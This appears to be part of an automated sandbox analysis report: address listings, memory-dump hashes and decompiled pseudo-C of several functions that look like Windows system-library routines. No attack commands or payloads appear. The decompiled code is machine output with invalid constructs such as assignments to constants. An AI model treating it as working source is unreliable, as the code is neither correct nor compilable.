                        0x02b0863f
                        0x02b08642
                        0x02b08645
                        0x02b08648
                        0x02b0864d
                        0x02b59b69
                        0x02b59b6e
                        0x02b59b7b
                        0x02b59b81
                        0x02b59b85
                        0x02b59b89
                        0x02b59ba7
                        0x02b59b8b
                        0x02b59b91
                        0x02b59b9a
                        0x02b59b9f
                        0x02b59b9f
                        0x02b08788
                        0x02b0878d
                        0x02b08763
                        0x02b08763
                        0x02b08766
                        0x00000000
                        0x02b08766
                        0x02b59b70
                        0x00000000
                        0x02b59b70
                        0x02b08656
                        0x02b0865a
                        0x02b0865c
                        0x02b08752
                        0x02b08756
                        0x00000000
                        0x00000000
                        0x02b0875e
                        0x00000000
                        0x02b0875e
                        0x02b08662
                        0x02b08662
                        0x02b08662
                        0x02b08666
                        0x00000000
                        0x02b08666
                        0x02b085b7
                        0x02b085b9
                        0x02b085bc
                        0x02b085bf
                        0x02b085cc
                        0x02b085d1
                        0x02b085d4
                        0x02b085db
                        0x02b085de
                        0x02b085e0
                        0x02b59b5f
                        0x00000000
                        0x02b59b5f
                        0x02b085e6
                        0x02b085ea
                        0x02b086c3
                        0x02b086c5
                        0x02b086c8
                        0x02b086ca
                        0x02b59b16
                        0x00000000
                        0x02b59b16
                        0x02b086d6
                        0x02b085f6
                        0x02b085f6
                        0x02b085f9
                        0x02b08602
                        0x02b08606
                        0x02b0860a
                        0x02b0860b
                        0x02b0860e
                        0x02b08611
                        0x00000000
                        0x02b08611
                        0x02b085f3
                        0x00000000
                        0x02b085f3
                        0x02b08619
                        0x02b0861e
                        0x02b0861e
                        0x02b08621
                        0x02b08622
                        0x02b08623
                        0x02b08625
                        0x02b0862c
                        0x00000000
                        0x02b0873d
                        0x00000000
                        0x02b0873d
                        0x02b08737
                        0x02b0850f
                        0x02b08512
                        0x00000000
                        0x02b08512
                        0x00000000
                        0x02b084d6

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 929679a730e2bdee85a1b7f742545644c5d075edbbba3832680d5017625227f9
                        • Instruction ID: fa6c743c55710fd5be08ab609391bec0c578a955583ba46a167d26e17b982890
                        • Opcode Fuzzy Hash: 929679a730e2bdee85a1b7f742545644c5d075edbbba3832680d5017625227f9
                        • Instruction Fuzzy Hash: C8B15970E00659DFDB16DFE8C9C0AADBBB6FF48304F1441A9E415AB295DB70AA41CF90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B2513A, Relevance: .3, Instructions: 258COMMON
                        Download Yara Rule
                        C-Code - Quality: 67%
                        			E02B2513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x2bed360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E02B3D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E02B12280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L02B14620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E02B3F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E02B0FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x2beb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E02B3B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                        0x02b25142
                        0x02b2514c
                        0x02b25150
                        0x02b25157
                        0x02b25159
                        0x02b2515e
                        0x02b25165
                        0x02b25169
                        0x02b2516c
                        0x02b25172
                        0x02b25176
                        0x02b2517a
                        0x02b2517a
                        0x02b2517a
                        0x02b2517f
                        0x02b66d8b
                        0x02b66d8e
                        0x02b66d91
                        0x02b66d95
                        0x02b66d98
                        0x02b66d9c
                        0x02b66da0
                        0x02b66da3
                        0x02b66da7
                        0x02b66e26
                        0x02b66e26
                        0x02b66e2a
                        0x02b251f9
                        0x02b251f9
                        0x02b251fe
                        0x02b66e33
                        0x02b66e33
                        0x02b66e39
                        0x02b66e3d
                        0x02b66e46
                        0x02b66e50
                        0x00000000
                        0x00000000
                        0x02b66e52
                        0x02b66e53
                        0x02b66e56
                        0x02b66e5d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x02b66e5f
                        0x02b66e67
                        0x02b66e77
                        0x02b66e7f
                        0x02b66e80
                        0x02b66e88
                        0x02b66e90
                        0x02b66e9f
                        0x02b66ea5
                        0x02b66ea9
                        0x02b66eb1
                        0x02b66ebf
                        0x00000000
                        0x00000000
                        0x02b66ecf
                        0x02b66ed3
                        0x00000000
                        0x00000000
                        0x02b66edb
                        0x02b66ede
                        0x02b66ee1
                        0x02b66ee8
                        0x02b66eeb
                        0x02b66eed
                        0x02b66ef0
                        0x02b66ef4
                        0x02b66ef8
                        0x02b66efc
                        0x00000000
                        0x00000000
                        0x02b66f0d
                        0x02b66f11
                        0x02b66f32
                        0x02b66f37
                        0x02b66f3b
                        0x02b66f3e
                        0x02b66f41
                        0x02b66f46
                        0x00000000
                        0x00000000
                        0x02b66f4c
                        0x02b66f50
                        0x02b66f50
                        0x02b66f54
                        0x02b66f62
                        0x02b66f65
                        0x02b66f6d
                        0x02b66f7b
                        0x02b66f7b
                        0x02b66f93
                        0x02b66f98
                        0x02b66fa0
                        0x02b66fa6
                        0x02b66fb3
                        0x02b66fb6
                        0x02b66fbf
                        0x02b66fc1
                        0x02b66fd5
                        0x02b66fda
                        0x02b66fda
                        0x02b66fdd
                        0x02b66fe2
                        0x02b66fe7
                        0x02b66feb
                        0x02b66fef
                        0x02b66ff3
                        0x02b2520c
                        0x02b2520c
                        0x02b2520f
                        0x02b25215
                        0x02b25234
                        0x02b2523a
                        0x02b2523a
                        0x02b25244
                        0x02b25245
                        0x02b25246
                        0x02b25251
                        0x02b25251
                        0x02b66f13
                        0x02b66f17
                        0x02b66f17
                        0x02b66f18
                        0x02b66f1b
                        0x02b66f1f
                        0x02b66f23
                        0x00000000
                        0x02b66f28
                        0x02b25204
                        0x02b25204
                        0x02b25208
                        0x00000000
                        0x02b25208
                        0x02b25185
                        0x02b25188
                        0x02b2518a
                        0x02b2518e
                        0x02b25195
                        0x02b66db1
                        0x02b66db5
                        0x02b66db9
                        0x02b2519b
                        0x02b2519b
                        0x02b2519e
                        0x02b251a7
                        0x02b251a9
                        0x02b251a9
                        0x02b251b5
                        0x02b251b8
                        0x02b251bb
                        0x02b251be
                        0x02b251c1
                        0x02b251c5
                        0x02b251c9
                        0x02b251cd
                        0x02b251cd
                        0x02b251d8
                        0x02b251dc
                        0x02b251e0
                        0x02b66dcc
                        0x02b66dd0
                        0x02b66dd5
                        0x02b66ddd
                        0x02b66de1
                        0x02b66de1
                        0x02b66de5
                        0x02b66deb
                        0x02b66df1
                        0x02b66df7
                        0x02b66dfd
                        0x02b66e01
                        0x02b66e05
                        0x02b66e09
                        0x02b66e0d
                        0x02b66e11
                        0x02b66e11
                        0x02b251eb
                        0x02b66e1a
                        0x02b66e1f
                        0x02b66e21
                        0x02b66e23
                        0x00000000
                        0x02b251f1
                        0x02b251f1
                        0x00000000
                        0x02b251f1

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: edec05448a02846dedbc41605eb430415c585ed3ae1c00bd2f1b42c4ce5ab1cd
                        • Instruction ID: b33dcbc18fb804b97c2de69d4a66f62499b3020cd6623c61ef3f29e1038017ec
                        • Opcode Fuzzy Hash: edec05448a02846dedbc41605eb430415c585ed3ae1c00bd2f1b42c4ce5ab1cd
                        • Instruction Fuzzy Hash: 5CC111755093808FD364CF28C580A6AFBE1FF88308F1449AEF8998B352D775E945CB52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02B203E2, Relevance: .3, Instructions: 254COMMON
                        Download Yara Rule
                        C-Code - Quality: 74%
                        			E02B203E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x2bed360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E02B20548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E02B3B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E02B0B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x2be7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E02B17D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E02B17D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E02B77016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E02B39830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E02B769A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x2be7c04 != 0) {
						_t118 = _v12;
						_t120 = E02B7A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x2be7bd8;
						if( *0x2be7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E02B395D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E02B399A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E02B73540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E02AFB1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E02B3AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x2be8474 - 3;
										if( *0x2be8474 != 3) {
											 *0x2be79dc =  *0x2be79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E02B17D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
					if( *_t83 != 0) {
						_t84 =  *[fs:0x30];
						__eflags =  *(_t84 + 0x240) & 0x00000004;
						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
							_t94 = E02B17D50();
							__eflags = _t94;
							if(_t94 == 0) {
								_t95 = 0x7ffe0385;
							} else {
								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t95 & 0x00000020;
							if(( *_t95 & 0x00000020) != 0) {
								E02B77016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
						if( *0x2be8708 != 0) {
							_t118 =  *0x7ffe0330;
							_t123 =  *0x2be7b00; // 0x0
							asm("ror esi, cl");
							 *0x2beb1e0(_v12, _v20, 0x20);
							_t93 =  *(_t123 ^  *0x7ffe0330)();
							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
							asm("sbb esi, esi");
							_t120 =  ~_t50 & _t93;
						} else {
							_t120 = 0;
						}
					}
					if( !_t120 >= 0) {
						L19:
						_push( *_t105);
						E02B395D0();
						 *_t105 =  *_t105 & 0x00000000;
						goto L20;
					}
					_t120 = E02B07F65(_t119);
					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
						__eflags = _t120;
						if(_t120 < 0) {
							goto L19;
						}
						 *(_t119 + 0x64) = _v12;
						goto L22;
					}
					goto L19;
				}
			}








































                        0x02b203f1
                        0x02b203f7
                        0x02b203f9
                        0x02b203fb
                        0x02b203fd
                        0x02b20400
                        0x02b2040a
                        0x02b64c7a
                        0x02b20537
                        0x02b20547
                        0x02b20410
                        0x02b20410
                        0x02b20414
                        0x02b20417
                        0x02b2041a
                        0x02b20421
                        0x02b20424
                        0x02b2042b
                        0x02b2043b
                        0x02b2043e
                        0x02b2043f
                        0x02b2043f
                        0x02b20446
                        0x02b20449
                        0x02b2044c
                        0x02b2044f
                        0x02b20459
                        0x02b64c8d
                        0x02b2045f
                        0x02b2045f
                        0x02b2045f
                        0x02b20467
                        0x02b64c97
                        0x02b64c9d
                        0x02b64ca4
                        0x02b64caa
                        0x02b64caf
                        0x02b64cb1
                        0x02b64cc3
                        0x02b64cb3
                        0x02b64cbc
                        0x02b64cbc
                        0x02b64cc8
                        0x02b64ccb
                        0x02b64cd7
                        0x02b64cda
                        0x02b64cdf
                        0x02b64cdf
                        0x02b64ccb
                        0x02b64ca4
                        0x02b2046d
                        0x02b2046f
                        0x02b2046f
                        0x02b20471
                        0x02b20476
                        0x02b2047a
                        0x02b2047b
                        0x02b20483
                        0x02b20489
                        0x02b2048d
                        0x00000000
                        0x00000000
                        0x02b64ce9
                        0x02b64cef
                        0x02b64d22
                        0x02b64d22
                        0x00000000
                        0x02b64d22
                        0x02b64cf1
                        0x02b64cf7
                        0x00000000
                        0x00000000
                        0x02b64cf9
                        0x02b64cff
                        0x00000000
                        0x00000000
                        0x02b64d05
                        0x02b64d07
                        0x00000000
                        0x00000000
                        0x02b64d0d
                        0x02b64d0f
                        0x02b64d14
                        0x02b64d16
                        0x00000000
                        0x00000000
                        0x02b64d1c
                        0x02b64d1c
                        0x02b20499
                        0x02b20535
                        0x02b20535
                        0x00000000
                        0x02b20535
                        0x02b204a6
                        0x02b64d2c
                        0x02b64d37
                        0x02b64d39
                        0x02b64d3b
                        0x00000000
                        0x00000000
                        0x02b64d41
                        0x02b64d48
                        0x02b20527
                        0x02b2052b
                        0x02b2052d
                        0x02b20530
                        0x02b20530
                        0x00000000
                        0x02b2052b
                        0x02b64d4e
                        0x02b204ac
                        0x02b204ac
                        0x02b204af
                        0x02b204b2
                        0x02b204b7
                        0x02b204b9
                        0x02b204bb
                        0x02b204bd
                        0x02b204bf
                        0x02b204c5
                        0x02b204c9
                        0x02b64d53
                        0x02b64d59
                        0x02b64db9
                        0x02b64dba
                        0x02b64dbf
                        0x02b64dc2
                        0x02b64dc4
                        0x02b64dc7
                        0x02b64dce
                        0x00000000
                        0x02b64dce
                        0x02b64d5b
                        0x02b64d61
                        0x00000000
                        0x00000000
                        0x02b64d63
                        0x02b64d69
                        0x00000000
                        0x00000000
                        0x02b64d6b
                        0x02b64d6e
                        0x02b64d74
                        0x02b64d76
                        0x02b64d7c
                        0x02b64d7e
                        0x02b64d84
                        0x02b64d89
                        0x02b64d8c
                        0x02b64d8d
                        0x02b64d92
                        0x02b64d95
                        0x02b64d96
                        0x02b64d98
                        0x02b64d9a
                        0x02b64d9f
                        0x02b64da4
                        0x02b64da6
                        0x02b64da8
                        0x02b64daf
                        0x02b64db1
                        0x02b64db1
                        0x02b64daf
                        0x02b64da6
                        0x02b64d84
                        0x02b64d7c
                        0x00000000
                        0x02b64d74
                        0x02b204d6
                        0x02b64de1
                        0x02b204dc
                        0x02b204dc
                        0x02b204dc
                        0x02b204e4
                        0x02b64deb
                        0x02b64df1
                        0x02b64df8
                        0x02b64dfe
                        0x02b64e03
                        0x02b64e05
                        0x02b64e17
                        0x02b64e07
                        0x02b64e10
                        0x02b64e10
                        0x02b64e1c
                        0x02b64e1f
                        0x02b64e35
                        0x02b64e35
                        0x02b64e1f
                        0x02b64df8
                        0x02b204f1
                        0x02b204fa
                        0x02b64e3f
                        0x02b64e47
                        0x02b64e5b
                        0x02b64e61
                        0x02b64e67
                        0x02b64e69
                        0x02b64e71
                        0x02b64e73
                        0x02b20500
                        0x02b20500
                        0x02b20500
                        0x02b204fa
                        0x02b20508
                        0x02b2051d
                        0x02b2051d
                        0x02b2051f
                        0x02b20524
                        0x00000000
                        0x02b20524
                        0x02b20515
                        0x02b20517
                        0x02b64e7a
                        0x02b64e7c
                        0x00000000
                        0x00000000
                        0x02b64e85
                        0x00000000
                        0x02b64e85
                        0x00000000
                        0x02b20517

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp Download File
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp Download File
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 8131fbe01d4d6c0bb6ac55b20697b6cad176bec15f826509642216ea4eef6be3
                        • Instruction ID: b713a3062db0fecfe6915d46cc383189b86492a12f7690ba9290d1398ea44647
                        • Opcode Fuzzy Hash: 8131fbe01d4d6c0bb6ac55b20697b6cad176bec15f826509642216ea4eef6be3
                        • Instruction Fuzzy Hash: 06912B31E007649FDF31AB68C848BBEB7B5EB05718F0506E1E924AB2D1DB789D44CB91
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02AFC600, Relevance: .2, Instructions: 225COMMON
                        Download Yara Rule
                        C-Code - Quality: 67%
                        			E02AFC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x2bed360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E02B06D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E02B3B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x2be7b9c; // 0x0
					_t74 = L02B14620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E02B39650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L02B177F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
